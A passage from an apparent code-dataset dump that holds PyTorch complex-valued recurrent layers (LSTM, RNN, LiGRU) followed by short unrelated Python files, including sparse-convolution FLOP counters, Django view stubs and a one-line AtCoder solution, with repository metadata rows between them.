if hx is not None:
h = self._complexlstm_cell(w, hx)
else:
h = self._complexlstm_cell(w, self.h_init)
if self.bidirectional:
h_f, h_b = h.chunk(2, dim=0)
h_b = h_b.flip(1)
h = torch.cat([h_f, h_b], dim=2)
return h
def _complexlstm_cell(self, w, ht):
"""Returns the hidden states for each time step.
Arguments
---------
wx : torch.Tensor
Linearly transformed input.
"""
hiddens = []
# Initialise the cell state
ct = self.h_init
# Sampling dropout mask
drop_mask = self._sample_drop_mask()
# Loop over time axis
for k in range(w.shape[1]):
gates = w[:, k] + self.u(ht)
(itr, iti, ftr, fti, otr, oti, ctr, cti) = gates.chunk(8, 1)
it = torch.sigmoid(torch.cat([itr, iti], dim=-1))
ft = torch.sigmoid(torch.cat([ftr, fti], dim=-1))
ot = torch.sigmoid(torch.cat([otr, oti], dim=-1))
ct = (
it * torch.tanh(torch.cat([ctr, cti], dim=-1)) * drop_mask
+ ft * ct
)
ht = ot * torch.tanh(ct)
hiddens.append(ht)
# Stacking hidden states
h = torch.stack(hiddens, dim=1)
return h
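The `gates.chunk(8, 1)` / `torch.cat` pattern in `_complexlstm_cell` splits the projected gates into real and imaginary halves and re-joins them per gate. A minimal torch-free sketch of that slicing (the values are arbitrary placeholders):

```python
def chunk(vec, n):
    """Split a flat list into n equal consecutive chunks (a list
    analogue of torch.chunk along the feature axis)."""
    k = len(vec) // n
    return [vec[i * k:(i + 1) * k] for i in range(n)]

# Toy gate vector laid out as (itr, iti, ftr, fti, otr, oti, ctr, cti),
# i.e. real/imaginary halves of the input, forget, output and cell gates.
gates = [1, 2, 3, 4, 5, 6, 7, 8]
itr, iti, ftr, fti, otr, oti, ctr, cti = chunk(gates, 8)

# Re-concatenating the real and imaginary halves of one gate, as
# torch.cat([itr, iti], dim=-1) does before applying the sigmoid:
i_gate = itr + iti
# i_gate == [1, 2]
```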
def _init_drop(self, batch_size):
"""Initializes the recurrent dropout operation. To speed it up,
the dropout masks are sampled in advance.
"""
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
self.N_drop_masks = 16000
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2)
).data
def _sample_drop_mask(self,):
"""Selects one of the pre-defined dropout masks
"""
if self.training:
# Sample new masks when needed
if self.drop_mask_cnt + self.batch_size > self.N_drop_masks:
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
# Sampling the mask
drop_mask = self.drop_masks[
self.drop_mask_cnt : self.drop_mask_cnt + self.batch_size
]
self.drop_mask_cnt = self.drop_mask_cnt + self.batch_size
else:
drop_mask = self.drop_mask_te
return drop_mask
def _change_batch_size(self, x):
"""This function changes the batch size when it is different from
the one detected in the initialization method. This might happen in
the case of multi-gpu or when we have different batch sizes in train
and test. We also update the h_int and drop masks.
"""
if self.batch_size != x.shape[0]:
self.batch_size = x.shape[0]
if self.training:
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
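The `_init_drop`/`_sample_drop_mask` pair above amortizes dropout sampling by pre-drawing a pool of masks and slicing batch-sized windows from it, resampling once the pool is exhausted. A torch-free sketch of that bookkeeping (the class and parameter names are illustrative, not part of the original API):

```python
import random

class DropMaskPool:
    """Pre-samples a pool of inverted-dropout masks and hands out
    batch-sized slices, mirroring _init_drop/_sample_drop_mask."""

    def __init__(self, n_masks, width, p, seed=0):
        self.n_masks, self.width, self.p = n_masks, width, p
        self.rng = random.Random(seed)
        self.cnt = 0  # analogue of drop_mask_cnt
        self._resample()

    def _resample(self):
        scale = 1.0 / (1.0 - self.p)  # inverted-dropout scaling
        self.masks = [
            [0.0 if self.rng.random() < self.p else scale
             for _ in range(self.width)]
            for _ in range(self.n_masks)
        ]

    def sample(self, batch_size):
        # Resample the whole pool when the remaining masks cannot
        # cover the requested batch, as in _sample_drop_mask.
        if self.cnt + batch_size > self.n_masks:
            self.cnt = 0
            self._resample()
        out = self.masks[self.cnt:self.cnt + batch_size]
        self.cnt += batch_size
        return out

pool = DropMaskPool(n_masks=8, width=4, p=0.5)
masks = pool.sample(3)  # 3 masks of width 4, entries 0.0 or 2.0
```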
class CRNN(torch.nn.Module):
""" This function implements a vanilla complex-valued RNN.
Input format is (batch, time, fea) or (batch, time, fea, channel).
In the latter shape, the two last dimensions will be merged:
(batch, time, fea * channel)
Arguments
---------
hidden_size : int
Number of output neurons (i.e., the dimensionality of the output).
The specified value is in terms of complex-valued neurons. Thus, the
output dimensionality is 2*hidden_size.
num_layers : int, optional
Number of layers to employ in the RNN architecture (default 1).
nonlinearity : str, optional
Type of nonlinearity (tanh, relu) (default "tanh").
bias : bool, optional
If True, the additive bias b is adopted (default True).
dropout : float, optional
It is the dropout factor (must be between 0 and 1) (default 0.0).
return_hidden : bool, optional
If True, the function returns the last hidden layer (default False).
bidirectional : bool, optional
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used (default False).
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weight_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
Example
-------
>>> inp_tensor = torch.rand([10, 16, 30])
>>> rnn = CRNN(hidden_size=16, input_shape=inp_tensor.shape)
>>> out_tensor = rnn(inp_tensor)
>>> out_tensor.shape
torch.Size([10, 16, 32])
"""
def __init__(
self,
hidden_size,
input_shape,
nonlinearity="tanh",
num_layers=1,
bias=True,
dropout=0.0,
bidirectional=False,
return_hidden=False,
init_criterion="glorot",
weight_init="complex",
):
super().__init__()
self.hidden_size = hidden_size * 2 # z = x + iy
self.nonlinearity = nonlinearity
self.num_layers = num_layers
self.bias = bias
self.dropout = dropout
self.bidirectional = bidirectional
self.reshape = False
self.return_hidden = return_hidden
self.init_criterion = init_criterion
self.weight_init = weight_init
if len(input_shape) > 3:
self.reshape = True
# Computing the feature dimensionality
self.fea_dim = torch.prod(torch.tensor(input_shape[2:]))
self.batch_size = input_shape[0]
self.rnn = self._init_layers()
def _init_layers(self):
"""Initializes the layers of the CRNN."""
rnn = torch.nn.ModuleList([])
current_dim = self.fea_dim
for i in range(self.num_layers):
rnn_lay = CRNN_Layer(
current_dim,
self.hidden_size,
self.num_layers,
self.batch_size,
dropout=self.dropout,
nonlinearity=self.nonlinearity,
bidirectional=self.bidirectional,
init_criterion=self.init_criterion,
weight_init=self.weight_init,
)
rnn.append(rnn_lay)
if self.bidirectional:
current_dim = self.hidden_size * 2
else:
current_dim = self.hidden_size
return rnn
def forward(self, x, hx=None):
"""Returns the output of the vanilla CRNN.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
# Reshaping input tensors for 4d inputs
if self.reshape:
if x.ndim == 4:
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3])
output, hh = self._forward_rnn(x, hx=hx)
if self.return_hidden:
return output, hh
else:
return output
def _forward_rnn(self, x, hx):
"""Returns the output of the vanilla CRNN.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
h = []
if hx is not None:
if self.bidirectional:
hx = hx.reshape(
self.num_layers, self.batch_size * 2, self.hidden_size
)
# Processing the different layers
for i, rnn_lay in enumerate(self.rnn):
if hx is not None:
x = rnn_lay(x, hx=hx[i])
else:
x = rnn_lay(x, hx=None)
h.append(x[:, -1, :])
h = torch.stack(h, dim=1)
if self.bidirectional:
h = h.reshape(h.shape[1] * 2, h.shape[0], self.hidden_size)
else:
h = h.transpose(0, 1)
return x, h
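The 4-D handling in `forward` merges the last two axes, (batch, time, fea, channel) -> (batch, time, fea * channel), with the feature dimensionality precomputed as the product of `input_shape[2:]`. A nested-list sketch of the same reshape (the shapes are illustrative):

```python
from math import prod

def flatten_fea_channel(x):
    """Merge the last two axes of a (batch, time, fea, channel)
    nested list into (batch, time, fea * channel)."""
    return [
        [[v for fea in step for v in fea] for step in batch]
        for batch in x
    ]

input_shape = (1, 1, 2, 2)       # (batch, time, fea, channel)
fea_dim = prod(input_shape[2:])  # 4, as torch.prod(...) computes above
x = [[[[1, 2], [3, 4]]]]
y = flatten_fea_channel(x)       # [[[1, 2, 3, 4]]]
```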
class CRNN_Layer(torch.nn.Module):
""" This function implements complex-valued recurrent layer.
Arguments
---------
input_size : int
Feature dimensionality of the input tensors (in terms of real values).
batch_size : int
Batch size of the input tensors.
hidden_size : int
Number of output values (in terms of real values).
num_layers : int, optional
Number of layers to employ in the RNN architecture (default 1).
nonlinearity : str, optional
Type of nonlinearity (tanh, relu) (default "tanh").
dropout : float, optional
It is the dropout factor (must be between 0 and 1) (default 0.0).
bidirectional : bool, optional
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used (default False).
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weight_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
"""
def __init__(
self,
input_size,
hidden_size,
num_layers,
batch_size,
dropout=0.0,
nonlinearity="tanh",
bidirectional=False,
init_criterion="glorot",
weight_init="complex",
):
super(CRNN_Layer, self).__init__()
self.hidden_size = int(hidden_size) // 2  # Expressed in terms of complex numbers
self.input_size = int(input_size)
self.batch_size = batch_size
self.bidirectional = bidirectional
self.dropout = dropout
self.init_criterion = init_criterion
self.weight_init = weight_init
self.w = CLinear(
input_shape=self.input_size,
n_neurons=self.hidden_size,
bias=False,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
self.u = CLinear(
input_shape=self.hidden_size * 2,  # The recurrent input size is in terms of real values
n_neurons=self.hidden_size,
bias=False,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
if self.bidirectional:
self.batch_size = self.batch_size * 2
# Initial state
self.h_init = torch.zeros(1, self.hidden_size * 2, requires_grad=False)
# Preloading dropout masks (gives some speed improvement)
self._init_drop(self.batch_size)
# Initializing dropout
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
# Setting the activation function
if nonlinearity == "tanh":
self.act = torch.nn.Tanh()
else:
self.act = torch.nn.ReLU()
def forward(self, x, hx=None):
# type: (Tensor, Optional[Tensor]) -> Tensor # noqa F821
"""Returns the output of the CRNN_layer.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
if self.bidirectional:
x_flip = x.flip(1)
x = torch.cat([x, x_flip], dim=0)
# Change batch size if needed
# self._change_batch_size(x)
# Feed-forward affine transformations (all steps in parallel)
w = self.w(x)
# Processing time steps
if hx is not None:
h = self._complexrnn_cell(w, hx)
else:
h = self._complexrnn_cell(w, self.h_init)
if self.bidirectional:
h_f, h_b = h.chunk(2, dim=0)
h_b = h_b.flip(1)
h = torch.cat([h_f, h_b], dim=2)
return h
def _complexrnn_cell(self, w, ht):
"""Returns the hidden states for each time step.
Arguments
---------
wx : torch.Tensor
Linearly transformed input.
"""
hiddens = []
# Sampling dropout mask
drop_mask = self._sample_drop_mask()
# Loop over time axis
for k in range(w.shape[1]):
at = w[:, k] + self.u(ht)
ht = self.act(at) * drop_mask
hiddens.append(ht)
# Stacking hidden states
h = torch.stack(hiddens, dim=1)
return h
def _init_drop(self, batch_size):
"""Initializes the recurrent dropout operation. To speed it up,
the dropout masks are sampled in advance.
"""
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
self.N_drop_masks = 16000
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
def _sample_drop_mask(self,):
"""Selects one of the pre-defined dropout masks.
"""
if self.training:
# Sample new masks when needed
if self.drop_mask_cnt + self.batch_size > self.N_drop_masks:
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
# Sampling the mask
drop_mask = self.drop_masks[
self.drop_mask_cnt : self.drop_mask_cnt + self.batch_size
]
self.drop_mask_cnt = self.drop_mask_cnt + self.batch_size
else:
drop_mask = self.drop_mask_te
return drop_mask
def _change_batch_size(self, x):
"""This function changes the batch size when it is different from
the one detected in the initialization method. This might happen in
the case of multi-gpu or when we have different batch sizes in train
and test. We also update the h_int and drop masks.
"""
if self.batch_size != x.shape[0]:
self.batch_size = x.shape[0]
if self.training:
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
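The recurrence inside `_complexrnn_cell` is a_t = w_t + U h_{t-1} followed by the activation (and a dropout mask). A scalar toy version, with a single weight `u` standing in for the recurrent CLinear transform (purely illustrative, not the module's API):

```python
import math

def crnn_step(w_t, h_prev, u=0.5, act=math.tanh):
    """One step of the vanilla recurrence: h_t = act(w_t + u * h_prev)."""
    return act(w_t + u * h_prev)

h, outs = 0.0, []
for w_t in [0.1, 0.2, 0.3]:  # pre-computed input projections w = W x
    h = crnn_step(w_t, h)
    outs.append(h)
```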
class CLiGRU(torch.nn.Module):
""" This function implements a complex-valued Light GRU (liGRU).
Ligru is single-gate GRU model based on batch-norm + relu
activations + recurrent dropout. For more info see:
Anonymous
To speed it up, it is compiled with the torch just-in-time compiler (jit)
right before using it.
It accepts input tensors formatted as (batch, time, fea).
In the case of 4d inputs like (batch, time, fea, channel) the tensor is
flattened as (batch, time, fea*channel).
Arguments
---------
hidden_size : int
Number of output neurons (i.e., the dimensionality of the output).
The specified value is in terms of complex-valued neurons. Thus, the
output dimensionality is 2*hidden_size.
nonlinearity : str
Type of nonlinearity (tanh, relu).
normalization : str
Type of normalization for the ligru model (batchnorm, layernorm).
Every string different from batchnorm and layernorm will result
in no normalization.
num_layers : int
Number of layers to employ in the RNN architecture.
bias : bool
If True, the additive bias b is adopted.
dropout : float
It is the dropout factor (must be between 0 and 1).
return_hidden : bool
If True, the function returns the last hidden layer.
bidirectional : bool
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used.
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weight_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
Example
-------
>>> inp_tensor = torch.rand([10, 16, 30])
>>> rnn = CLiGRU(input_shape=inp_tensor.shape, hidden_size=16)
>>> out_tensor = rnn(inp_tensor)
>>> out_tensor.shape
torch.Size([10, 16, 32])
"""
def __init__(
self,
hidden_size,
input_shape,
nonlinearity="relu",
normalization="batchnorm",
num_layers=1,
bias=True,
dropout=0.0,
bidirectional=False,
return_hidden=False,
init_criterion="glorot",
weight_init="complex",
):
super().__init__()
self.hidden_size = hidden_size * 2 # z = x + iy
self.nonlinearity = nonlinearity
self.num_layers = num_layers
self.normalization = normalization
self.bias = bias
self.dropout = dropout
self.bidirectional = bidirectional
self.reshape = False
self.return_hidden = return_hidden
self.init_criterion = init_criterion
self.weight_init = weight_init
if len(input_shape) > 3:
self.reshape = True
self.fea_dim = torch.prod(torch.tensor(input_shape[2:]))
self.batch_size = input_shape[0]
self.rnn = self._init_layers()
def _init_layers(self):
"""Initializes the layers of the CLiGRU."""
rnn = torch.nn.ModuleList([])
current_dim = self.fea_dim
for i in range(self.num_layers):
rnn_lay = CLiGRU_Layer(
current_dim,
self.hidden_size,
self.num_layers,
self.batch_size,
dropout=self.dropout,
nonlinearity=self.nonlinearity,
normalization=self.normalization,
bidirectional=self.bidirectional,
init_criterion=self.init_criterion,
weight_init=self.weight_init,
)
rnn.append(rnn_lay)
if self.bidirectional:
current_dim = self.hidden_size * 2
else:
current_dim = self.hidden_size
return rnn
def forward(self, x, hx=None):
"""Returns the output of the CliGRU.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
# Reshaping input tensors for 4d inputs
if self.reshape:
if x.ndim == 4:
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3])
# run ligru
output, hh = self._forward_ligru(x, hx=hx)
if self.return_hidden:
return output, hh
else:
return output
def _forward_ligru(self, x, hx):
"""Returns the output of the CliGRU.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
h = []
if hx is not None:
if self.bidirectional:
hx = hx.reshape(
self.num_layers, self.batch_size * 2, self.hidden_size
)
# Processing the different layers
for i, ligru_lay in enumerate(self.rnn):
if hx is not None:
x = ligru_lay(x, hx=hx[i])
else:
x = ligru_lay(x, hx=None)
h.append(x[:, -1, :])
h = torch.stack(h, dim=1)
if self.bidirectional:
h = h.reshape(h.shape[1] * 2, h.shape[0], self.hidden_size)
else:
h = h.transpose(0, 1)
return x, h
class CLiGRU_Layer(torch.nn.Module):
"""
This function implements complex-valued Light-Gated Recurrent Unit layer.
Arguments
---------
input_size : int
Feature dimensionality of the input tensors.
batch_size : int
Batch size of the input tensors.
hidden_size : int
Number of output values.
num_layers : int
Number of layers to employ in the RNN architecture.
nonlinearity : str
Type of nonlinearity (tanh, relu).
normalization : str
Type of normalization (batchnorm, layernorm).
Every string different from batchnorm and layernorm will result
in no normalization.
dropout : float
It is the dropout factor (must be between 0 and 1).
bidirectional : bool
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used.
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weight_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
"""
def __init__(
self,
input_size,
hidden_size,
num_layers,
batch_size,
dropout=0.0,
nonlinearity="relu",
normalization="batchnorm",
bidirectional=False,
init_criterion="glorot",
weight_init="complex",
):
super(CLiGRU_Layer, self).__init__()
self.hidden_size = int(hidden_size) // 2
self.input_size = int(input_size)
self.batch_size = batch_size
self.bidirectional = bidirectional
self.dropout = dropout
self.init_criterion = init_criterion
self.weight_init = weight_init
self.normalization = normalization
self.nonlinearity = nonlinearity
self.w = CLinear(
input_shape=self.input_size,
n_neurons=self.hidden_size * 2,
bias=False,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
self.u = CLinear(
input_shape=self.hidden_size * 2,  # The recurrent input size is in terms of real values
n_neurons=self.hidden_size * 2,
bias=False,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
if self.bidirectional:
self.batch_size = self.batch_size * 2
# Initializing batch norm
self.normalize = False
if self.normalization == "batchnorm":
self.norm = CBatchNorm(
input_size=hidden_size * 2, dim=-1, momentum=0.05,
)
self.normalize = True
elif self.normalization == "layernorm":
self.norm = CLayerNorm(input_size=hidden_size * 2, dim=-1)
self.normalize = True
else:
# Normalization is disabled here. self.norm is only formally
# initialized to avoid jit issues.
self.norm = CLayerNorm(input_size=hidden_size * 2, dim=-1)
self.normalize = False
# Initial state
self.h_init = torch.zeros(1, self.hidden_size * 2, requires_grad=False)
# Preloading dropout masks (gives some speed improvement)
self._init_drop(self.batch_size)
# Initializing dropout
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
# Setting the activation function
if self.nonlinearity == "tanh":
self.act = torch.nn.Tanh()
else:
self.act = torch.nn.ReLU()
def forward(self, x, hx=None):
# type: (Tensor, Optional[Tensor]) -> Tensor # noqa F821
"""Returns the output of the Complex liGRU layer.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
if self.bidirectional:
x_flip = x.flip(1)
x = torch.cat([x, x_flip], dim=0)
# Change batch size if needed
self._change_batch_size(x)
# Feed-forward affine transformations (all steps in parallel)
w = self.w(x)
# Apply batch normalization
if self.normalize:
w_bn = self.norm(w.reshape(w.shape[0] * w.shape[1], w.shape[2]))
w = w_bn.reshape(w.shape[0], w.shape[1], w.shape[2])
# Processing time steps
if hx is not None:
h = self._complex_ligru_cell(w, hx)
else:
h = self._complex_ligru_cell(w, self.h_init)
if self.bidirectional:
h_f, h_b = h.chunk(2, dim=0)
h_b = h_b.flip(1)
h = torch.cat([h_f, h_b], dim=2)
return h
def _complex_ligru_cell(self, w, ht):
"""Returns the hidden states for each time step.
Arguments
---------
wx : torch.Tensor
Linearly transformed input.
"""
hiddens = []
# Sampling dropout mask
drop_mask = self._sample_drop_mask()
# Loop over time axis
for k in range(w.shape[1]):
gates = w[:, k] + self.u(ht)
atr, ati, ztr, zti = gates.chunk(4, 1)
at = torch.cat([atr, ati], dim=-1)
zt = torch.cat([ztr, zti], dim=-1)
zt = torch.sigmoid(zt)
hcand = self.act(at) * drop_mask
ht = zt * ht + (1 - zt) * hcand
hiddens.append(ht)
# Stacking hidden states
h = torch.stack(hiddens, dim=1)
return h
def _init_drop(self, batch_size):
"""Initializes the recurrent dropout operation. To speed it up,
the dropout masks are sampled in advance.
"""
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
self.N_drop_masks = 16000
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2)
).data
def _sample_drop_mask(self,):
"""Selects one of the pre-defined dropout masks.
"""
if self.training:
# Sample new masks when needed
if self.drop_mask_cnt + self.batch_size > self.N_drop_masks:
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
# Sampling the mask
drop_mask = self.drop_masks[
self.drop_mask_cnt : self.drop_mask_cnt + self.batch_size
]
self.drop_mask_cnt = self.drop_mask_cnt + self.batch_size
else:
drop_mask = self.drop_mask_te
return drop_mask
def _change_batch_size(self, x):
"""This function changes the batch size when it is different from
the one detected in the initialization method. This might happen in
the case of multi-gpu or when we have different batch sizes in train
and test. We also update the h_int and drop masks.
"""
if self.batch_size != x.shape[0]:
self.batch_size = x.shape[0]
if self.training:
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2)
).data
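The single-gate update in `_complex_ligru_cell` interpolates between the previous state and a ReLU candidate: z_t = sigmoid(z_pre), hcand = relu(a_t), h_t = z_t * h_{t-1} + (1 - z_t) * hcand. A scalar sketch of that step (dropout mask and normalization omitted; the function name is illustrative):

```python
import math

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

def ligru_step(a_t, z_pre, h_prev):
    """One scalar LiGRU update: gate z blends the old state with a
    ReLU candidate computed from the pre-activation a_t."""
    z = sigmoid(z_pre)
    hcand = max(0.0, a_t)  # ReLU candidate (recurrent dropout omitted)
    return z * h_prev + (1.0 - z) * hcand

h = ligru_step(a_t=2.0, z_pre=0.0, h_prev=0.0)
# z = 0.5, hcand = 2.0, so h = 1.0
```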
336f9cc7d54409add6778480cef157c8eb95ae8b | 103 | py | Python | tests/data/example.py | Korijn/pygui | 11be153bbdc389c5749ed82490289d6e2c2f704c | [
"MIT"
] | 2 | 2022-02-22T08:10:03.000Z | 2022-02-22T08:21:48.000Z | tests/data/example.py | Korijn/pygui | 11be153bbdc389c5749ed82490289d6e2c2f704c | [
"MIT"
] | 7 | 2022-02-24T16:38:45.000Z | 2022-03-10T08:31:13.000Z | tests/data/example.py | fork-tongue/collagraph | 7370b4ad8bc58a04c644be5be241e4ccb40f8893 | [
"MIT"
] | null | null | null
import collagraph as cg
def example_func_component(props):
return cg.h("example-func-component")
681bb0412ec75b0f335656d194ddb2351bdf3f92 | 1,254 | py | Python | utils/flops.py | yydlmzyz/PCGCv2 | 21ec0871543a89ed9e7aa1a1efa58341cbc7ff6b | [
"Apache-2.0"
] | 13 | 2020-11-30T10:11:19.000Z | 2022-02-16T10:53:21.000Z | utils/flops.py | xtorker/PCGCv2 | 845e8ac02d9393ee129392c6f47504894c5870c3 | [
"Apache-2.0"
] | null | null | null | utils/flops.py | xtorker/PCGCv2 | 845e8ac02d9393ee129392c6f47504894c5870c3 | [
"Apache-2.0"
] | 2 | 2021-10-20T13:06:21.000Z | 2021-12-10T16:49:20.000Z
import torch
import MinkowskiEngine as ME
import numpy as np
def _count_sparse_conv(kernel_size, in_channels, out_channels):
total_params = pow(kernel_size[0], 3) * in_channels * out_channels + out_channels
return total_params
def count_sparse_conv(m: ME.MinkowskiConvolution, x: ME.SparseTensor, y: ME.SparseTensor):
total_params = _count_sparse_conv(m.kernel_size, m.in_channels, m.out_channels)
n_points = len(y.C)
m.total_params += torch.DoubleTensor([int(total_params)])
# print(np.int64(total_params) * np.int64(n_points)/pow(10,9))
m.total_ops += torch.LongTensor([np.int64(total_params) * np.int64(n_points)])
def _count_sparse_deconv(kernel_size, in_channels, out_channels):
total_params = pow(kernel_size[0], 3) * in_channels * out_channels + out_channels
return total_params
def count_sparse_deconv(m: ME.MinkowskiConvolutionTranspose, x: ME.SparseTensor, y: ME.SparseTensor):
total_params = _count_sparse_deconv(m.kernel_size, m.in_channels, m.out_channels)
n_points = len(y.C)
m.total_params += torch.DoubleTensor([int(total_params)])
# print(m, np.int64(total_params) * np.int64(n_points)/pow(10,9))
m.total_ops += torch.LongTensor([np.int64(total_params) * np.int64(n_points)])
681c21cbc63af2f1a5efa31fc1755152cde9557e | 134 | py | Python | cpp_python_module.py | csrunner/new_feat | 5174312634c696b022f624a047d1dcb7435dfeba | [
"MIT"
] | null | null | null | cpp_python_module.py | csrunner/new_feat | 5174312634c696b022f624a047d1dcb7435dfeba | [
"MIT"
] | null | null | null | cpp_python_module.py | csrunner/new_feat | 5174312634c696b022f624a047d1dcb7435dfeba | [
"MIT"
] | null | null | null
def cpp_call_python_func(a):
return a + 1
from python_call_cpp_module import python_call_cpp_func
print(python_call_cpp_func(2))
6844c6186d465d2c54c724504a2ebf92d35edcbb | 132 | py | Python | ivy/array/general.py | sert121/ivy | 286f86e487b0c83d46a3ef8d30aa96316337db32 | [
"Apache-2.0"
] | 161 | 2021-01-20T22:11:13.000Z | 2022-01-09T09:46:33.000Z | ivy/array/general.py | sert121/ivy | 286f86e487b0c83d46a3ef8d30aa96316337db32 | [
"Apache-2.0"
] | 4 | 2021-11-10T17:04:36.000Z | 2021-11-26T06:40:43.000Z | ivy/array/general.py | sert121/ivy | 286f86e487b0c83d46a3ef8d30aa96316337db32 | [
"Apache-2.0"
] | 8 | 2021-02-17T20:56:33.000Z | 2022-01-09T16:45:40.000Z
# global
import abc
# ToDo: implement all general methods here as public class methods
class ArrayWithGeneral(abc.ABC):
pass
| 14.666667 | 66 | 0.757576 | 18 | 132 | 5.555556 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189394 | 132 | 8 | 67 | 16.5 | 0.934579 | 0.537879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
d7b2b7f0bc5bbce66fa9177f9f54b931cb24db72 | 30 | py | Python | atcoder/abc163/a.py | sugitanishi/competitive-programming | 51af65fdce514ece12f8afbf142b809d63eefb5d | [
"MIT"
] | null | null | null | atcoder/abc163/a.py | sugitanishi/competitive-programming | 51af65fdce514ece12f8afbf142b809d63eefb5d | [
"MIT"
] | null | null | null | atcoder/abc163/a.py | sugitanishi/competitive-programming | 51af65fdce514ece12f8afbf142b809d63eefb5d | [
"MIT"
] | null | null | null | print(int(input())*2*3.141592) | 30 | 30 | 0.7 | 6 | 30 | 3.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.266667 | 0 | 30 | 1 | 30 | 30 | 0.433333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
d7b58b1a71fc82d063cc971ae0fd6a0a2f919284 | 158 | py | Python | cornucopia/views/tokens.py | AlexandraAlter/django-cornucopia | 1681ccbc5e98736e61f6afb1b78931dda9547486 | [
"MIT"
] | null | null | null | cornucopia/views/tokens.py | AlexandraAlter/django-cornucopia | 1681ccbc5e98736e61f6afb1b78931dda9547486 | [
"MIT"
] | null | null | null | cornucopia/views/tokens.py | AlexandraAlter/django-cornucopia | 1681ccbc5e98736e61f6afb1b78931dda9547486 | [
"MIT"
] | null | null | null | from django import http, views
class TokenListView(views.View):
pass
class NewTokenView(views.View):
pass
class TokenView(views.View):
pass
